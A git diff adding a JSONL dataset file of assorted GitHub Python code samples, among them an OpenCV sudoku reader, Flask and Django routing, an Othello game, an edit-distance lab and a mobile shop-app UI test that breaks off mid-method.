diff --git "a/3866.jsonl" "b/3866.jsonl" new file mode 100644--- /dev/null +++ "b/3866.jsonl" @@ -0,0 +1,1729 @@ +{"seq_id":"27548907271","text":"import cv2\nimport numpy as np\nimport plotCVImg\n\n# 是否查看中间过程\nDEBUG = 1\n# 标准方格大小\nGRID_WIDTH = 40\nGRID_HEIGHT = 40\n# 标准数字大小\nNUM_WIDTH = 20\nNUM_HEIGHT = 20\n# 数独尺寸\nSUDOKU_SIZE = 9\n\n# 存储题目的数组 shape=(9*9, 20*20)\nsudoku = np.zeros(shape=(9 * 9, NUM_WIDTH * NUM_HEIGHT))\n\n# 读取图片 read image\nimg_original = cv2.imread('./questions/01.png')\nif DEBUG:\n plotCVImg.plotImg(img_original, \"original\")\n\n# img_original = cv2.imread('./questions/01.png')\n# img_gray = cv2.cvtColor(img_original, cv2.COLOR_BGR2GRAY)\n# img_Blur = cv2.medianBlur(img_gray, 3)\n# img_Blur = cv2.GaussianBlur(img_Blur, (3, 3), 0)","repo_name":"LemonITCN/s-engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39249906964","text":"\"\"\"\nCollection of minor helper functions and classes\n\"\"\"\n\nimport yaml\n\n\nclass Constants:\n\tdef __init__(self):\n\t\twith open('constants.yaml', 'r') as f:\n\t\t\tconstants = yaml.safe_load(f)\n\t\tself.constants = constants\n\t\tself.prefix = constants['prefix']\n\t\tself.prefix_start = constants['prefix_start']\n\t\tself.bucket = constants['s3_bucket_name']\n\t\n","repo_name":"Meadosc/compare_dictionaries","sub_path":"comp_dict/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36838841019","text":"# -*- coding: utf-8 -*-\nfrom peewee import *\nfrom Db_Server import db_server\nimport csv\nimport random\n\nclass Bus_line(Model):\n BUS_NUM = CharField(null=True)\n STOP_CODE = CharField(null=True) # IntegerField(null=True) 숫자인데 코드 앞에 0이 있어서 캐릭터로 함\n STOP_NAME = CharField(null=True)\n\n class Meta:\n database = db_server.psql_db # This model uses the \"people.db\" database.\n\ndef table_create():\n # db_server.db_connect()\n\n db_server.table_create(Bus_line)\n\ndef table_drop():\n # db_server.db_connect()\n\n db_server.table_drop(Bus_line)\n\ndef insert_interest():\n\n with open(\"C:\\\\yang\\\\bus\\\\BUS_LINE.csv\", encoding=\"utf-8\") as data_file:\n reader = list(csv.reader(data_file, delimiter=',', quotechar='\"'))\n reader.remove(reader[0])\n cnt = 0\n for row in reader:\n Bus_line.insert(BUS_NUM=row[1], STOP_CODE=row[4], STOP_NAME=row[5]).execute()\n\n\n\n\ndef loader():\n old_list = []\n\n for i in Bus_line.select().order_by(Bus_line.id).tuples():\n old_list.append(i)\n\n return old_list\n\n\n\n\n#\n#\n\ndef sample_loader(number):\n # end = math.ceil(len(Old_building().select().tuples())/100)\n old_list =[]\n rand_list = []\n\n for i in Bus_line.select().order_by(Bus_line.id).tuples():\n old_list.append(i)\n\n for j in random.sample(old_list,number):\n rand_list.append(j)\n\n# return old_list\n return rand_list","repo_name":"CHS71/git_Python","sub_path":"Python_postrgresql9.6/Model/Bus_line.py","file_name":"Bus_line.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2157919294","text":"from flask import Blueprint, make_response, jsonify, Response\nfrom http import HTTPStatus\nfrom functools import partial\n\nfrom ..services import data\nfrom ..middlewares.authorization import token_required\nfrom ..middlewares.validation import validate_body\nfrom ..schemas.data import DetectSchema, DataBodySchema\n\nvalidate_detection = partial(validate_body, schema = DetectSchema)\nvalidate = partial(validate_body, schema = DataBodySchema)\n\ndata_bp = Blueprint(\"data\", __name__, url_prefix=\"/data\")\n\n@data_bp.route('/detect', methods=['GET', 'POST'])\n@token_required\n@validate_detection\ndef detect_data():\n try:\n response = data.detect_sensor()\n return response, HTTPStatus.OK\n \n except Exception as e:\n print(e)\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n\n@data_bp.route('/', methods=['GET'])\n@token_required\ndef get_data(id):\n try:\n response = data.find_data(id)\n return response, HTTPStatus.OK\n \n except Exception as e:\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n\n@data_bp.route('', methods=['GET'])\n@token_required\ndef get_user_data():\n try:\n response = data.find_user_data()\n return response, HTTPStatus.OK\n \n except Exception as e:\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n \n@data_bp.route('', methods=['POST'])\n@token_required\n@validate\ndef post_data():\n try:\n response = data.create_data()\n return response, HTTPStatus.CREATED\n \n except Exception as e:\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n \n@data_bp.route('/', methods=['PUT'])\n@token_required\n@validate\ndef put_data(id):\n try:\n response = data.update_data(id)\n return response, HTTPStatus.OK\n \n except Exception as e:\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n \n@data_bp.route('/', methods=['DELETE'])\n@token_required\ndef delete_data(id):\n try:\n response = data.remove_data(id)\n return response, HTTPStatus.OK\n \n except Exception as e:\n return {'error': str(e)}, HTTPStatus.BAD_REQUEST","repo_name":"Tallispt/ws-api","sub_path":"ws_api/controllers/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20044200048","text":"#!/usr/bin/env python3\nimport xml.etree.ElementTree as etree\nimport requests\nimport sys\nimport urllib.parse\n\n\nXML_URL = 'http://www.billboard.com/rss/charts/hot-100'\nROW_TMPL = \"\"\"\n\n{rank}\n{lastrank}\n{title}\n{artist}\n\n\"\"\"\nPAGE_TMPL = \"\"\"\n\n\n\n Hot 100\n \n\n\n\n\n \n \n \n \n\n{body}\n
RankLast RankTitleArtist
\n\n\n\"\"\"\nYOUTUBE_SEARCH_URL = 'https://youtube.com/results'\n\n\ndef fetch():\n req = requests.get(XML_URL)\n return etree.fromstring(req.text)\n\n\ndef get(tree):\n for item in tree.findall('.//item'):\n artist = item.findtext('./artist')\n title = item.findtext('./title')\n _, title = title.split(': ', 1)\n url = '{}?{}'.format(\n YOUTUBE_SEARCH_URL,\n urllib.parse.urlencode({\n 'q': '{} {}'.format(artist, title).lower(),\n }),\n )\n\n yield {\n 'artist': artist,\n 'title': title,\n 'rank': int(item.findtext('./rank_this_week')),\n 'lastrank': int(item.findtext('./rank_last_week')) or '—',\n 'link': url,\n }\n\n\ndef dump(items):\n body_parts = []\n for item in items:\n body_parts.append(ROW_TMPL.format(**item))\n return PAGE_TMPL.format(body=''.join(body_parts))\n\n\nif __name__ == '__main__':\n sys.stdout.write(dump(get(fetch())))\n","repo_name":"sampsyo/hot100","sub_path":"hot100.py","file_name":"hot100.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70497062554","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport board\nimport ui\nimport pygame\nfrom pygame.locals import *\nimport player\nfrom config import BLACK, WHITE, EMPTY, HUMAN, COMPUTER\nfrom copy import deepcopy\n\nclass Othello():\n \"\"\"\n brain class of othello game\n\n Members:\n\n board --othello board module\n gui --gui module\n \"\"\"\n def __init__(self):\n self.board = board.Board()\n self.gui = ui.GUI()\n self.set_options()\n self.stack = []\n\n def set_options(self):\n \"\"\"\n set up playres\n \"\"\"\n player1, player2 = self.gui.show_options()\n if player1 == HUMAN:\n self.now_playing = player.Human(self.gui, BLACK)\n else:\n self.now_playing = player.Computer(BLACK)\n if player2 == HUMAN:\n self.other_player = player.Human(self.gui, WHITE)\n else:\n self.other_player = player.Computer(WHITE)\n\n self.gui.show_game()\n self.gui.update_screen(self.board.board, 2, 2)\n\n def start(self):\n clock = pygame.time.Clock()\n self.stack.append(deepcopy(self.board))\n while True:\n clock.tick(100)\n if self.board.is_ended():\n stone_lst = self.board.count()\n if stone_lst[0] > stone_lst[1]:\n winner = BLACK\n elif stone_lst[1] > stone_lst[0]:\n winner = WHITE\n else:\n winner = None\n break\n self.now_playing.set_current_board(self.board)\n\n selectable_index = self.board.get_selectable_index(self.now_playing.color)\n if selectable_index != []:\n\n #人間の番なら置ける場所をガイドする\n #if isinstance(self.now_playing, player.Human):\n # self.gui.guide_screen(selectable_index)\n\n score, tmp = self.now_playing.move()\n if tmp != None:\n self.board = tmp\n self.stack.append(deepcopy(tmp))\n self.now_playing, self.other_player = self.other_player, self.now_playing\n else:\n self.stack.pop()\n self.stack.pop()\n self.board = deepcopy(self.stack[len(self.stack)-1])\n stone_lst = self.board.count()\n self.gui.update_screen(self.board.board, stone_lst[0], stone_lst[1])\n else:\n self.now_playing, self.other_player = self.other_player, self.now_playing\n\n\n self.wait()\n self.gui.show_winner(winner)\n self.wait()\n self.restart()\n\n def wait(self):\n while True:\n for event in pygame.event.get():\n if event.type == MOUSEBUTTONDOWN:\n return\n\n def restart(self):\n self.board = board.Board()\n self.set_options()\n self.start()\n\ndef main():\n game = Othello()\n game.start()\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuuyahypg/Reversi","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8675431493","text":"from django.conf.urls import include, url, static\nfrom django.contrib import admin\nfrom django.conf import settings\n\nfrom . import views\nfrom profiles import views as profile_views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^drivers$', views.drivers, name='drivers'),\n url(r'', include('tokenapi.urls')),\n url(r'^accounts/', include('registration.backends.default.urls')),\n url(r'^profiles/(?P\\w+)$', profile_views.profile, name='profile'),\n url(r'^laptimes/', include('laptimes.urls')),\n url(r'^api/laptimes/', include('laptimes.api.urls')),\n url(r'^admin/', admin.site.urls),\n]\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns += [url(r'^__debug__/', include(debug_toolbar.urls))]\n urlpatterns += static.static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","repo_name":"ev-agelos/ac-rank","sub_path":"ac_rank/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"2205992170","text":"import inflect\np = inflect.engine()\n\nnum_str = []\nnew = []\n\na = 'abcdefghijklmnopqrstuvwxyz'\n\nfor i in range(1000001):\n num_str.append(p.number_to_words(i))\n\nnum_str = ''.join(num_str)\n\nfor i in num_str:\n if i not in new and i.isalpha():\n new.append(i)\n\nprint('the 20th letter is {}!'.format(new[19]))\n \n\n\n\n\n\n","repo_name":"leojacoby/python","sub_path":"clamp.py","file_name":"clamp.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40226352760","text":"import FWCore.ParameterSet.Config as cms\n\nfrom RecoTauTag.RecoTau.HLTPFRecoTauQualityCuts_cfi import hltPFTauQualityCuts\nfrom RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadTrack, noPrediscriminants\nfrom RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation\n\nhltPFRecoTauDiscriminationByIsolation = pfRecoTauDiscriminationByIsolation.clone(\n PFTauProducer = 'hltPFRecoTauProducer', #tau collection to discriminate\n\n # Require leading pion ensures that:\n # 1) these is at least one track above threshold (0.5 GeV) in the signal cone\n # 2) a track in the signal cone has pT > 5 GeV\n Prediscriminants = noPrediscriminants,\n\n qualityCuts = hltPFTauQualityCuts,# set the standard quality cuts\n\n # Delta-Beta corrections to remove Pileup\n particleFlowSrc = \"hltParticleFlow\",\n vertexSrc = hltPFTauQualityCuts.primaryVertexSrc,\n customOuterCone = -1.0,\n\n # This must correspond to the cone size of the algorithm which built the\n # tau. (or if customOuterCone option is used, the custom cone size)\n isoConeSizeForDeltaBeta = 0.3,\n # The delta beta factor maps the expected neutral contribution in the\n # isolation cone from the observed PU charged contribution. This factor can\n # optionally be a function (use 'x') of the number of vertices in the event\n # (taken from the multiplicity of vertexSrc collection)\n deltaBetaFactor = \"0.38\",\n # By default, the pt threshold for tracks used to compute the DeltaBeta\n # correction is taken as the gamma Et threshold from the isolation quality\n # cuts.\n deltaBetaPUTrackPtCutOverride = True, # Set the boolean = True to override.\n deltaBetaPUTrackPtCutOverride_val = 0.5, # Set the value for new value.\n\n # Rho corrections\n applyRhoCorrection = False,\n rhoProducer = \"kt6PFJets:rho\",\n rhoConeSize = 0.5,\n rhoUEOffsetCorrection = 1.0,\n\n IDdefinitions = cms.VPSet(),\n IDWPdefinitions = cms.VPSet(\n cms.PSet(\n IDname = cms.string(\"pfRecoTauDiscriminationByIsolation\"),\n maximumOccupancy = cms.uint32(0), # no tracks > 1 GeV or gammas > 1.5 GeV allowed\n ApplyDiscriminationByTrackerIsolation = cms.bool(True), # use PFGammas when isolating\n )\n ),\n)\n","repo_name":"cms-sw/cmssw","sub_path":"RecoTauTag/RecoTau/python/HLTPFRecoTauDiscriminationByIsolation_cfi.py","file_name":"HLTPFRecoTauDiscriminationByIsolation_cfi.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"29050726118","text":"import pandas as pd\r\nimport os\r\n\r\n#load csv\r\ndat = pd.read_csv('dat.csv')\r\n\r\n#calculate profit on each sale\r\ndat[\"Profit\"] = dat[\"Sale price\"] - dat[\"Purchase price\"]\r\n#set profit = 0 for all unsold items\r\ndat[\"Profit\"] = dat[\"Profit\"].fillna(0)\r\n#sum profit\r\nTotalProfit = dat[\"Profit\"].sum()\r\n\r\n#iterate rows and display title and profit\r\nfor index, row in dat.iterrows():\r\n print(\"Book Title: \", row[\"Textbook\"], \" profit made: \", row[\"Profit\"])\r\nprint(\"Total Profit: \", TotalProfit)","repo_name":"RileyJHarris/SDVSAC1","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36388594199","text":"from openerp import models, fields, api\nfrom datetime import datetime as dt\nimport logging\nfrom openerp.exceptions import except_orm\n\n\nclass DPNPProcurementOrder(models.Model):\n _inherit = 'procurement.order'\n\n @api.multi\n def run(self, autocommit=False):\n res = super(DPNPProcurementOrder, self).run(autocommit)\n pur_obj = self.mapped('purchase_id')\n sale_obj = self.mapped(lambda x:x.sale_line_id.mapped(lambda y:y.order_id))\n sale_obj.ensure_one()\n newport_supplier = self.env['res.partner'].sudo().search([('company_code', '=', 'New Port')])\n if not newport_supplier:\n raise except_orm('Warning', 'Please create 1 Company with Company Code is *New Port*')\n newport_supplier.ensure_one()\n pur_obj.write({'purchaser': sale_obj.user_id.id, 'date_order': dt.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'partner_id': newport_supplier.id, 'vessel_name': sale_obj.vessel_name.id, 'vessel_id':sale_obj.vessel_id.id,\n 'other_vessel_name': sale_obj.other_vessel_name, 'other_shipping_agent': sale_obj.other_shipping_agent, 'order_mobile_number':sale_obj.order_mobile_number,\n 'order_contact_person': sale_obj.order_contact_person, 'shipping_agent_id': sale_obj.shipping_agent_id.id, 'crNum':sale_obj.shipping_agent_id.crNum,\n 'next_port_id': sale_obj.next_port_id.id,\n 'last_port_id': sale_obj.last_port_id.id,\n 'so_id': sale_obj.id,\n 'invoice_method': 'manual'})\n pur_obj.sudo().signal_workflow('purchase_confirm')\n return res","repo_name":"ct-17/pptech","sub_path":"erp_digital_platform/addons/dp_np_api/models/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4572436396","text":"import asyncio\nimport pytest\nfrom user_manager.user_manager import UserManager\n\n@pytest.fixture\ndef user_manager() -> UserManager:\n \"\"\"Создает экземпляр UserManager для каждого теста.\"\"\"\n return UserManager()\n\n@pytest.mark.asyncio\nasync def test_get_user_creates_new_user(user_manager: UserManager):\n \"\"\"\n Проверяет, что get_user корректно создает нового пользователя и инициализирует его свойства.\n \"\"\"\n user_id = \"12345\"\n user = await user_manager.get_user(user_id)\n assert user.id == user_id\n assert user.is_processing == False\n\n@pytest.mark.asyncio\nasync def test_get_user_returns_existing_user(user_manager: UserManager):\n \"\"\"\n Проверяет, что get_user возвращает существующий объект User, если он уже был создан для данного user_id.\n \"\"\"\n user_id = \"12345\"\n user1 = await user_manager.get_user(user_id)\n user2 = await user_manager.get_user(user_id)\n assert user1 is user2\n\n@pytest.mark.asyncio\nasync def test_users_are_independent(user_manager: UserManager):\n \"\"\"\n Проверяет, что каждый объект User обрабатывает свое состояние независимо от других объектов User.\n \"\"\"\n user1 = await user_manager.get_user(\"123\")\n user2 = await user_manager.get_user(\"456\")\n await user1.start_processing()\n assert user1.is_processing == True\n assert user2.is_processing == False","repo_name":"NailsRumford/BilliBot","sub_path":"tests/test_user_manager.py","file_name":"test_user_manager.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74903013276","text":"'''\nCreated on Oct 3, 2018\nI pledge my honor that I have abided by the Stevens Honor System\n@author: Andrea Meyer\nusername: ameyer\n'''\nimport time\nfrom cs115 import map\n\nwords = []\nHITS = 10\n\ndef ED(first, second):\n ''' Returns the edit distance between the strings first and second.'''\n if first == '':\n return len(second)\n elif second == '':\n return len(first)\n elif first[0] == second[0]:\n return ED(first[1:], second[1:])\n else:\n substitution = ED(first[1:], second[1:])\n deletion = ED(first[1:], second)\n insertion = ED(first, second[1:])\n return 1 + min(substitution, deletion, insertion)\n \nprint(ED(\"spam\", \"xsam\"))\nprint(ED(\"foo\", \"\"))\nprint(ED(\"foo\", \"bar\"))\nprint(ED(\"hello\", \"below\"))\nprint(ED(\"yes\", \"yelp\"))\n\ndef fastED(s1, s2):\n '''Returns the edit distance between the strings first and second. Uses\n memoization to speed up the process.'''\n def fastED_helper(s1, s2, memo):\n if (s1, s2) in memo:\n return memo[(s1, s2)]\n if s1 == '':\n return len(s2)\n if s2 == '':\n return len(s1)\n elif s1[0] == s2[0]:\n result = fastED_helper(s1[1:], s2[1:], memo)\n else:\n substitution = fastED_helper(s1[1:], s2[1:], memo)\n deletion = fastED_helper(s1[1:], s2, memo)\n insertion = fastED_helper(s1, s2[1:], memo)\n result = 1 + min(substitution, deletion, insertion)\n memo[(s1, s2)] = result\n return result\n return fastED_helper(s1, s2, {})\nprint(fastED(\"antidisestablishment\", \"antiquities\"))\nprint(fastED(\"xylophone\", \"yellow\"))\nprint(fastED(\"follow\", \"yellow\"))\nprint(fastED(\"lower\", \"hover\"))\n\n\ndef getSuggestions(user_input):\n '''For each word in the global words list, determine the edit distance of\n the user_input and the word. Return a list of tuples containing the\n (edit distance, word).\n Hint: Use map and lambda, and it's only one line of code!'''\n return map(lambda word: (fastED(user_input, word), word), words)\n\ndef spam():\n '''Main loop for the program that prompts the user for words to check.\n If the spelling is correct, it tells the user so. Otherwise, it provides up\n to HITS suggestions.\n\n To exit the loop, just hit Enter at the prompt.'''\n while True:\n user_input = input('spell check> ').strip()\n if user_input == '':\n break\n if user_input in words:\n print('Correct')\n else:\n start_time = time.time()\n suggestions = getSuggestions(user_input)\n suggestions.sort()\n endTime = time.time()\n print('Suggested alternatives:')\n for suggestion in suggestions[:HITS]:\n print(' %s' % suggestion[1])\n print('Computation time:', endTime - start_time, 'seconds')\n print('Bye')\n\nif __name__ == '__main__':\n f = open('3esl.txt')\n for word in f:\n words.append(word.strip())\n f.close()\n spam()","repo_name":"ameyer2145/CS115","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"41793597863","text":"\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.common_list_page import *\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.title_improve_detail_page import *\nfrom mobile.mitem_ui_test.mitem_ui_test.item_info import *\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.shop_test_page import *\n\nclass ItemList(CommonList):\n\n go_detail_locator = ('and', (('attr.*=', ('text', '销量: \\d*件')),))\n on_shelf_button_locator = ('and', (('attr=', ('text', '上架')),))\n off_shelf_button_locator = ('and', (('attr=', ('text', '下架')),))\n promotion_button_locator = ('and', (('attr=', ('text', '促销推广')),))\n title_optimization_button_locator = ('and', (('attr.*=', ('text', '标题.*')),))\n mobile_detail_button_locator = ('and', (('attr=', ('text', '手机详情')),))\n copy_link_button_locator = ('and', (('attr=', ('text', '复制链接')),))\n two_dimensional_code_button_locator = ('and', (('attr=', ('text', '二维码')),))\n choose_button_locator = ('and', (('attr=', ('text', '筛选')),))\n long_click_two_dimensional_code_locator = ('and', (('attr=', ('text', '长按识别二维码')),))\n more_function_locator = ('and', (('attr=', ('text', '···')),))\n tab_onsale_locator = ('and', (('attr.*=', ('text', '出售中.*')),))\n tab_inventory_locator = ('and', (('attr.*=', ('text', '仓库中.*')),))\n tab_soldout_locator = ('and', (('attr.*=', ('text', '已售完.*')),))\n\n calendar_anchor = ('and', (('attr.*=', ('text', '立即.*')),))\n\n # 方法,滑动弹窗\n def swipe_618(self):\n poco(name='android.widget.Image').swipe([0, 1])\n\n # 方法:进入宝贝详情页\n def go_detail_page(self):\n element_click(self.go_detail_locator)\n try:\n poco(textMatches='.*授权.*', name='com.taobao.qianniu:id/open_auth_btn_grant').wait_for_appearance(\n 5) # 第一次进入授权,5秒显示等待\n poco(textMatches='.*授权.*', name='com.taobao.qianniu:id/open_auth_btn_grant').click()\n except Exception:\n pass\n poco(text='编辑图片').wait_for_appearance(6) # 跳转详情页,3秒显示等待\n poco(text='查看宝贝').click()\n self.turn_back()\n # self.swipe_618()\n\n\n # 获取出售中数量\n def get_onsale_number(self):\n onsale_number = poco(name='tab0')\n onsale_number_text = get_text_of_view(onsale_number)\n num = re.findall('\\d+', onsale_number_text)\n return int(num[0])\n\n # 获取仓库中数量\n def get_inventory_number(self):\n inventory_number = poco(name='tab1')\n inventory_number_text = get_text_of_view(inventory_number)\n num = re.findall('\\d+', inventory_number_text)\n return int(num[0])\n\n # 获取已售完数量\n def get_soldout_number(self):\n soldout_number = poco(name='tab2')\n soldout_number_text = get_text_of_view(soldout_number)\n num = re.findall('\\d+', soldout_number_text)\n return int(num[0])\n\n # 获取第一个宝贝库存数量\n def get_stock_number(self):\n stock_text = poco(textMatches='库存.*').get_text()\n num = re.findall('\\d+', stock_text)\n return int(num[0])\n\n # 获取第一个宝贝销量数量\n def get_sold_number(self):\n sold_text = poco(textMatches='销量.*').get_text()\n num = re.findall('\\d+', sold_text)\n return int(num[0])\n\n # 上架第一个宝贝\n def on_shelf_list(self):\n if not init_element(self.on_shelf_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.on_shelf_button_locator)\n poco(text='确定').click()\n\n #下架\n def off_shelf_list(self):\n if not init_element(self.off_shelf_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.off_shelf_button_locator)\n poco(text='确定').click()\n\n #促销推广\n def promotion_list(self) -> bool:\n self.element_click_async(self.promotion_button_locator)\n poco(text='满减优惠').click()\n self.check_QN_auth()\n self.check_AYitem_auth()\n # 立刻创建1个满减优惠活动,判断是否成功\n self.quick_create()\n # 返回,进入促销打折页面,立刻创建1个促销打折活动,判断是否成功\n sleep(3)\n self.turn_back()\n poco(text='促销打折').click()\n self.check_QN_auth()\n self.check_AYitem_auth()\n self.quick_create()\n # 结束创建成功的促销打折活动,避免影响店铺体检跳转ump\n poco(name=' 知道了 ').click()\n poco(name='android.support.v7.widget.RecyclerView').swipe([0, 1])\n sleep(2)\n poco(name='结束活动').click()\n poco(text='确定').click()\n sleep(1)\n self.turn_back()\n return True\n\n # 快速创建ump活动\n def quick_create(self) -> bool:\n \"\"\"\n\n :return:\n 如果创建失败,返回False\n \"\"\"\n try:\n poco(name=' 创建活动 ').wait_for_appearance(5) # 跳转ump页面,5秒显示等待\n except PocoTargetTimeout:\n return False\n poco(name=' 创建活动 ').click()\n poco(name='确定提交').click()\n try:\n poco(name='活动已创建成功!').wait_for_appearance(5)\n except PocoTargetTimeout:\n return False\n\n #标题优化\n def title_optimization_list(self) -> bool:\n self.element_click_async(self.title_optimization_button_locator)\n poco(text=ITEM_INVENTORY_TITLE).wait_for_appearance(10) # 跳转标题优化详情页,10秒显示等待\n TitleImproveDetail().edit_title('标题')\n title_before_improve = TitleImproveDetail().get_title()\n TitleImproveDetail().one_click_improve()\n sleep(3) # 一键优化,3秒sleep\n title_after_improve = TitleImproveDetail().get_title()\n return title_after_improve != title_before_improve\n\n #手机详情\n def mobile_detail_list(self) -> bool:\n self.element_click_async(self.mobile_detail_button_locator)\n try:\n poco(textMatches='.*生成.*').wait_for_appearance(5) # 跳转手机详情,3秒显示等待\n except PocoTargetTimeout:\n return False\n poco(textMatches='.*生成.*').click()\n try:\n poco(text='预计剩余时间').wait_for_appearance(3)\n except PocoTargetTimeout:\n return False\n self.turn_back()\n return True\n\n #复制链接\n def copy_link_list(self):\n if not init_element(self.copy_link_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n #淘宝链接\n copy_link_button = init_element(self.copy_link_button_locator)\n assert self.search_by_keyword('测试多sku属性宝贝',copy_link_button), '宝贝不存在'\n copy_link_button.click()\n poco(text = '取消').wait_for_appearance(5)\n poco(text = '淘宝链接').click()\n choose_button = init_element(self.choose_button_locator)\n search_close_button = locate_by_anchor(choose_button,3,'l0l0l1')\n search_close_button.click()\n element_click(self.search1_locator)\n poco(name='android.widget.EditText').long_click()\n poco(text = '粘贴').click()\n text1 = poco(name='android.widget.EditText').get_text()\n self.turn_back()\n #防微信屏蔽链接\n assert self.search_by_keyword(ITEM_COPY_LINK_TITLE, copy_link_button), '宝贝不存在'\n copy_link_button.click()\n poco(text='取消').wait_for_appearance(5)\n poco(text='防微信屏蔽链接').click()\n choose_button = init_element(self.choose_button_locator)\n search_close_button = locate_by_anchor(choose_button, 3, 'l0l0l1')\n search_close_button.click()\n element_click(self.search1_locator)\n poco(name='android.widget.EditText').long_click()\n poco(text='粘贴').click()\n text2 = poco(name='android.widget.EditText').get_text()\n self.turn_back()\n\n return text1,text2\n\n # 查看详情\n def view_detail_list(self, my_title: str):\n if not init_element(self.two_dimensional_code_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n view_detail_ele = locate_by_anchor(init_element(self.two_dimensional_code_button_locator), 2, 'l3')\n view_detail_ele.click()\n try:\n poco(text=my_title).wait_for_appearance(10)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n\n\n # 二维码\n def two_dimensional_code_list(self):\n if not init_element(self.two_dimensional_code_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.two_dimensional_code_button_locator)\n poco(text='下载图片').click()\n try:\n poco(text='图片下载失败').wait_for_appearance(8) # 等待文件保存到本地,8秒显示等待\n poco(text='确认').click()\n return False\n except PocoTargetTimeout:\n return True\n\n # 切换顶部tab\n def switch_tab(self, index: int):\n \"\"\"\n\n :param index:\n 0:出售中\n 1:仓库中\n 2:已售完\n :return:\n \"\"\"\n tab_dict = {\n 0: self.tab_onsale_locator,\n 1: self.tab_inventory_locator,\n 2: self.tab_soldout_locator\n }\n init_element(tab_dict.get(index)).invalidate()\n element_click(tab_dict.get(index))\n\n # 点击列表活动日历,跳转功能\n def activity_calendar_shop_test_enter(self) -> bool:\n # 如果日历下线,跳转店铺体检\n sleep(3)\n if not init_element(self.calendar_anchor).exists():\n print('日历已下线,跳转店铺体检')\n BasePage().close_auto_list()\n poco(text='查看详情').click()\n poco(text='一键优化').wait_for_appearance(60)\n ShopTest().click_one_touch_optimize()\n advertising_num = ShopTest().get_advertising_testing_num()\n baby_time_num = ShopTest().get_baby_up_and_down_num()\n hand_weights_num = ShopTest().get_hand_weights_num()\n if advertising_num != '0':\n return False\n if baby_time_num != '0':\n return False\n if hand_weights_num != '0':\n return False\n return True\n\n # 如果日历没下线,跳转活动日历\n else:\n my_function = locate_by_anchor(init_element(self.calendar_anchor), 2, 'l1').get_text()\n function1 = '设置营销折扣,吸引买家下单' # 促销打折话术\n function2 = '优化标题,增加宝贝曝光率' # 标题优化话术\n function3 = '多买多减优惠,提高客单价' # 满减优惠话术\n function4 = '投放活动海报,增强活动气氛' # 促销海报话术\n function5 = '添加活动水印,提示宝贝点击率' # 促销水印话术\n element_click(self.calendar_anchor)\n self.check_QN_auth()\n self.check_AYitem_auth()\n if my_function == function1:\n try:\n poco(name=' 创建活动 ').wait_for_appearance(5)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n elif my_function == function2:\n try:\n poco(text='上次优化时间:').wait_for_appearance(5)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n elif my_function == function3:\n try:\n poco(name=' 创建活动 ').wait_for_appearance(5)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n elif my_function == function4:\n try:\n poco(text='促销海报').wait_for_appearance(5)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n 